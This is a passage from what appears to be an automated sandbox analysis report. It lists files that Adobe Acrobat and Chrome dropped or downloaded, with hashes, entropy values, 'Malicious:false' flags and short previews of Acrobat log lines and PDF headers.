                                                                                                                                                                                                                                                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88hlQqRdw:Qw946cPbiOxDlbYnuRKrS
                                                                                                                                                                                                                                                                                MD5:B553D035C13EA3409947E020120220C7
                                                                                                                                                                                                                                                                                SHA1:07FF5FB067CCACEC247516BDEF1C946C432AC46F
                                                                                                                                                                                                                                                                                SHA-256:BCDF9EEFEFB56D182C79BB6B1713AB75C9ACAB1D17ACB182301BC1FF88FE30A2
                                                                                                                                                                                                                                                                                SHA-512:B5E980DCAA9FD18C243E39382864BF21DDB9EA2E68781367558066110D8A363BF215B132FB3CE3863C40B5B8E86CAFE899337CDD4629BB3CC6DDAD7202F5A067
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.9./.1.0./.2.0.2.4. . .1.4.:.0.6.:.2.9. .=.=.=.....
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (393)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16525
                                                                                                                                                                                                                                                                                Entropy (8bit):5.338264912747007
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                                                                                                                                                                                                                                                MD5:128A51060103D95314048C2F32A15C66
                                                                                                                                                                                                                                                                                SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                                                                                                                                                                                                                                                SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                                                                                                                                                                                                                                                                SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):15114
                                                                                                                                                                                                                                                                                Entropy (8bit):5.3164787518346435
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:/DvSvvu0Ii1lY7mYvNb0GETEsnskJEgWKlbcS+SnKyCUlUWxhqjaH0HGPsKEVA/L:u2U
                                                                                                                                                                                                                                                                                MD5:4432E955A8BE8F090C25F45BDB104942
                                                                                                                                                                                                                                                                                SHA1:70F778DAA43E7D1EDED98F745C7DC2349B43009B
                                                                                                                                                                                                                                                                                SHA-256:3A044AD4DF85604B8D3EA8BB3FC0E4AD0F2DB64D7F2A3D079758270DBAACFC13
                                                                                                                                                                                                                                                                                SHA-512:85260BB08C6B454DF08B35323410FB27347F05DE8ECF2CE9E2D2F683D43530D38704F87AAA24E7D9D1CFC32E3F4ED7C10794812EB441C4ED0138256A005888B9
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:SessionID=0bc198d8-b6ee-4de8-a4e2-45f4bdfb466c.1728497184162 Timestamp=2024-10-09T14:06:24:162-0400 ThreadID=6504 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=0bc198d8-b6ee-4de8-a4e2-45f4bdfb466c.1728497184162 Timestamp=2024-10-09T14:06:24:164-0400 ThreadID=6504 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=0bc198d8-b6ee-4de8-a4e2-45f4bdfb466c.1728497184162 Timestamp=2024-10-09T14:06:24:164-0400 ThreadID=6504 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=0bc198d8-b6ee-4de8-a4e2-45f4bdfb466c.1728497184162 Timestamp=2024-10-09T14:06:24:164-0400 ThreadID=6504 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=0bc198d8-b6ee-4de8-a4e2-45f4bdfb466c.1728497184162 Timestamp=2024-10-09T14:06:24:164-0400 ThreadID=6504 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):29752
                                                                                                                                                                                                                                                                                Entropy (8bit):5.397318607196284
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbdcbiIsucbx:V3fOCIdJDeAsd
                                                                                                                                                                                                                                                                                MD5:3EB1675400AC654A6E54466790FD5581
                                                                                                                                                                                                                                                                                SHA1:5A86351B293C16BD6C3520CC6AA4C7BE23BD303D
                                                                                                                                                                                                                                                                                SHA-256:0FC70089D82AD065E58CB919CC1D5D0C3E95587C682B4E45295FF4DE5985F335
                                                                                                                                                                                                                                                                                SHA-512:23A6557D4147CFFEB62F98496944F18A7C3160B3FF4F70E79C254FC9A2A3E6566D30EB96BD16F9D9241FC99D78A465D2CCE5857EAC024E66BA1137101F0DA01D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1419751
                                                                                                                                                                                                                                                                                Entropy (8bit):7.976496077007677
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24576:/xTwYIGNPtdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07teWL57oYGZd:JTwZGD3mlind9i4ufFXpAXkrfUs0MWL4
                                                                                                                                                                                                                                                                                MD5:42D802BE13D6C9BA29A07A9216FA0711
                                                                                                                                                                                                                                                                                SHA1:98C4204123E9243DB2E69005B38FE5E71A6C4464
                                                                                                                                                                                                                                                                                SHA-256:001E1792A7AE9C4AB7BA774051C8D40BBD0B31281A50BAF42573CF5B73B4B248
                                                                                                                                                                                                                                                                                SHA-512:54F52A1778C687367D844AB3B501241F4D173181B673873E0FA2A83AE7CE1A476B23B91E4884E53955B396CD849536091B002C5ACE389A3C3A7212F896360679
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1407294
                                                                                                                                                                                                                                                                                Entropy (8bit):7.97605879016224
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                                                                                                                                                                                                                MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                                                                                                                                                                                                                SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                                                                                                                                                                                                                SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                                                                                                                                                                                                                SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):758601
                                                                                                                                                                                                                                                                                Entropy (8bit):7.98639316555857
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                                                                                                                                                                                                MD5:3A49135134665364308390AC398006F1
                                                                                                                                                                                                                                                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                                                                                                                                                                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                                                                                                                                                                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):386528
                                                                                                                                                                                                                                                                                Entropy (8bit):7.9736851559892425
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                                                                                                                                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                                                                                                                                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                                                                                                                                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                                                                                                                                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):271384
                                                                                                                                                                                                                                                                                Entropy (8bit):7.813202875304079
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:+6fDd99r/72McIzOXshWrmlgW/kz+LZ0n8SjqmSkN+WPl86:+kDdb/D3zO+WalgW/A+LZ0nLWlkAWPlr
                                                                                                                                                                                                                                                                                MD5:BF1404EB713727C9C1B94F43CDBCF96E
                                                                                                                                                                                                                                                                                SHA1:D8E918CDA478B855D1253A87CE5D76A8E7EE2F3E
                                                                                                                                                                                                                                                                                SHA-256:466E7752332B087CB7189489A028AB1EA70B6C69A9A0A92F6F2972FF4808A45C
                                                                                                                                                                                                                                                                                SHA-512:BFC3CC923FC512D3A89D5CA5A816468E48198C3858E52AA7D731EBFD1A3CCA4F739F2AE5062021A263ED32260E5999AF1BBD334C9E01B6D7F057D6939EE321D8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:%PDF-1.7.%......13 0 obj.<</Linearized 1/L 244616/O 15/E 240177/N 2/T 244306/H [ 488 202]>>.endobj. ..27 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<DC45ED11E248B004AD2E1EB5BAECB6CA><A4E9C85B63DBD848A4BAED7FA03B20CD>]/Index[13 28]/Info 12 0 R/Length 84/Prev 244307/Root 14 0 R/Size 41/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``Z."....(....w..(.I.......D...... ..)X<.,..H......4y.X...".?.........#..endstream.endobj.startxref..0..%%EOF.. ..40 0 obj.<</Filter/FlateDecode/I 131/Length 115/O 115/S 62>>stream..h.b```f``2c`a``|. ..B@.. ..2........hr.SEG{GG.X...@1.C.P......+......xA..k?."...M.F3.....5"@...[....yg?... ..[N.N..endstream.endobj.14 0 obj.<</Metadata 5 0 R/Outlines 10 0 R/Pages 11 0 R/Type/Catalog>>.endobj.15 0 obj.<</Annots[28 0 R]/Contents 17 0 R/CropBox[0.0 0.0 595.28 841.89]/MediaBox[0.0 0.0 595.28 841.89]/Parent 11 0 R/Resources<</ColorSpace<</CS0 29 0 R>>/Font<</C0_0 34 0 R/C2_0 38 0 R>>/ProcSet[/PDF/Text/ImageC/ImageI]/XObject<
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):271384
                                                                                                                                                                                                                                                                                Entropy (8bit):7.813202875304079
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:+6fDd99r/72McIzOXshWrmlgW/kz+LZ0n8SjqmSkN+WPl86:+kDdb/D3zO+WalgW/A+LZ0nLWlkAWPlr
                                                                                                                                                                                                                                                                                MD5:BF1404EB713727C9C1B94F43CDBCF96E
                                                                                                                                                                                                                                                                                SHA1:D8E918CDA478B855D1253A87CE5D76A8E7EE2F3E
                                                                                                                                                                                                                                                                                SHA-256:466E7752332B087CB7189489A028AB1EA70B6C69A9A0A92F6F2972FF4808A45C
                                                                                                                                                                                                                                                                                SHA-512:BFC3CC923FC512D3A89D5CA5A816468E48198C3858E52AA7D731EBFD1A3CCA4F739F2AE5062021A263ED32260E5999AF1BBD334C9E01B6D7F057D6939EE321D8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:%PDF-1.7.%......13 0 obj.<</Linearized 1/L 244616/O 15/E 240177/N 2/T 244306/H [ 488 202]>>.endobj. ..27 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<DC45ED11E248B004AD2E1EB5BAECB6CA><A4E9C85B63DBD848A4BAED7FA03B20CD>]/Index[13 28]/Info 12 0 R/Length 84/Prev 244307/Root 14 0 R/Size 41/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``Z."....(....w..(.I.......D...... ..)X<.,..H......4y.X...".?.........#..endstream.endobj.startxref..0..%%EOF.. ..40 0 obj.<</Filter/FlateDecode/I 131/Length 115/O 115/S 62>>stream..h.b```f``2c`a``|. ..B@.. ..2........hr.SEG{GG.X...@1.C.P......+......xA..k?."...M.F3.....5"@...[....yg?... ..[N.N..endstream.endobj.14 0 obj.<</Metadata 5 0 R/Outlines 10 0 R/Pages 11 0 R/Type/Catalog>>.endobj.15 0 obj.<</Annots[28 0 R]/Contents 17 0 R/CropBox[0.0 0.0 595.28 841.89]/MediaBox[0.0 0.0 595.28 841.89]/Parent 11 0 R/Resources<</ColorSpace<</CS0 29 0 R>>/Font<</C0_0 34 0 R/C2_0 38 0 R>>/ProcSet[/PDF/Text/ImageC/ImageI]/XObject<
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):271384
                                                                                                                                                                                                                                                                                Entropy (8bit):7.813202875304079
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:+6fDd99r/72McIzOXshWrmlgW/kz+LZ0n8SjqmSkN+WPl86:+kDdb/D3zO+WalgW/A+LZ0nLWlkAWPlr
                                                                                                                                                                                                                                                                                MD5:BF1404EB713727C9C1B94F43CDBCF96E
                                                                                                                                                                                                                                                                                SHA1:D8E918CDA478B855D1253A87CE5D76A8E7EE2F3E
                                                                                                                                                                                                                                                                                SHA-256:466E7752332B087CB7189489A028AB1EA70B6C69A9A0A92F6F2972FF4808A45C
                                                                                                                                                                                                                                                                                SHA-512:BFC3CC923FC512D3A89D5CA5A816468E48198C3858E52AA7D731EBFD1A3CCA4F739F2AE5062021A263ED32260E5999AF1BBD334C9E01B6D7F057D6939EE321D8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:%PDF-1.7.%......13 0 obj.<</Linearized 1/L 244616/O 15/E 240177/N 2/T 244306/H [ 488 202]>>.endobj. ..27 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<DC45ED11E248B004AD2E1EB5BAECB6CA><A4E9C85B63DBD848A4BAED7FA03B20CD>]/Index[13 28]/Info 12 0 R/Length 84/Prev 244307/Root 14 0 R/Size 41/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``Z."....(....w..(.I.......D...... ..)X<.,..H......4y.X...".?.........#..endstream.endobj.startxref..0..%%EOF.. ..40 0 obj.<</Filter/FlateDecode/I 131/Length 115/O 115/S 62>>stream..h.b```f``2c`a``|. ..B@.. ..2........hr.SEG{GG.X...@1.C.P......+......xA..k?."...M.F3.....5"@...[....yg?... ..[N.N..endstream.endobj.14 0 obj.<</Metadata 5 0 R/Outlines 10 0 R/Pages 11 0 R/Type/Catalog>>.endobj.15 0 obj.<</Annots[28 0 R]/Contents 17 0 R/CropBox[0.0 0.0 595.28 841.89]/MediaBox[0.0 0.0 595.28 841.89]/Parent 11 0 R/Resources<</ColorSpace<</CS0 29 0 R>>/Font<</C0_0 34 0 R/C2_0 38 0 R>>/ProcSet[/PDF/Text/ImageC/ImageI]/XObject<
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                                                                Entropy (8bit):7.948595144672337
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:+Fr3sG84BizZj2xy8pjTpeNJgQiSW6GfL12n2:+T84MQ48ppeN+QiSWrfLY2
                                                                                                                                                                                                                                                                                MD5:36A9B1D8F552B31D77696659784AB160
                                                                                                                                                                                                                                                                                SHA1:71BAB93AB824050288A7D5812E927EC9985AA3F9
                                                                                                                                                                                                                                                                                SHA-256:AAA1B6A9D9EF977C345E343235AFD051B0C875635429D731A81A44303910E0E1
                                                                                                                                                                                                                                                                                SHA-512:07B6F90DE654C4CCB410E11F0F94AA52F00E3DFF14DDB451B128F0DBDA32F1B901BA71519A9FF9AD26BB82D44462005C74BB8225C6958FC804FA5A6727598C44
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:%PDF-1.7.%......13 0 obj.<</Linearized 1/L 244616/O 15/E 240177/N 2/T 244306/H [ 488 202]>>.endobj. ..27 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<DC45ED11E248B004AD2E1EB5BAECB6CA><A4E9C85B63DBD848A4BAED7FA03B20CD>]/Index[13 28]/Info 12 0 R/Length 84/Prev 244307/Root 14 0 R/Size 41/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``Z."....(....w..(.I.......D...... ..)X<.,..H......4y.X...".?.........#..endstream.endobj.startxref..0..%%EOF.. ..40 0 obj.<</Filter/FlateDecode/I 131/Length 115/O 115/S 62>>stream..h.b```f``2c`a``|. ..B@.. ..2........hr.SEG{GG.X...@1.C.P......+......xA..k?."...M.F3.....5"@...[....yg?... ..[N.N..endstream.endobj.14 0 obj.<</Metadata 5 0 R/Outlines 10 0 R/Pages 11 0 R/Type/Catalog>>.endobj.15 0 obj.<</Annots[28 0 R]/Contents 17 0 R/CropBox[0.0 0.0 595.28 841.89]/MediaBox[0.0 0.0 595.28 841.89]/Parent 11 0 R/Resources<</ColorSpace<</CS0 29 0 R>>/Font<</C0_0 34 0 R/C2_0 38 0 R>>/ProcSet[/PDF/Text/ImageC/ImageI]/XObject<
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (22063), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):22064
                                                                                                                                                                                                                                                                                Entropy (8bit):4.8654655187166815
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:5OhzKJPKAzEf7PBVqxj2E6SgTIaFSgTId6jJi9NhKjUcSgTI5bSgTId6MfKKw3s6:HnKtxCQxwWHpEV+bi
                                                                                                                                                                                                                                                                                MD5:D2702DCFED567BCA070F8FC55EE3BBE6
